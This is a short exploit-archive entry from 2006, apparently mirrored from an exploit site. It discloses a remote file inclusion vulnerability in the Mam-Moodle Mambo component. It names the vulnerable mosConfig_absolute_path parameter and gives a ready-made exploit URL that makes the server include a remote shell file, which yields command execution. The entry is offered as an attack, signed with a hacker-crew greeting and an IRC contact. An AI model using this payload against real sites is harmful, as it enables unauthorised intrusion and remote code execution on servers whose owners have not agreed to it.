[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mam-Moodle Mambo Component alpha Remote Inclusion Vulnerability
# Published : 2006-07-23
# Author : jank0
# Previous Title : ArticlesOne <= 07232006 (page) Remote Include Vulnerability
# Next Title : multibanners Mambo Component <= 1.0.1 Remote Inclusion Vulnerability
####################################################################################
#Mam - Moodle Remote File Include
------------------------------------------------------------------------------------
#Bug Found by: jank0
#greetz: hackbsd crew
#risk: dangerous
##this bug allows a remote atacker to execute commands via rfi
path: ?mosConfig_absolute_path=
xpl:
http://web/components/com_moodle/moodle.php?mosConfig_absolute_path=http://shell.txt
Contact: irc.undernet.org #hackbsd
# www.Syue.com [2006-07-23]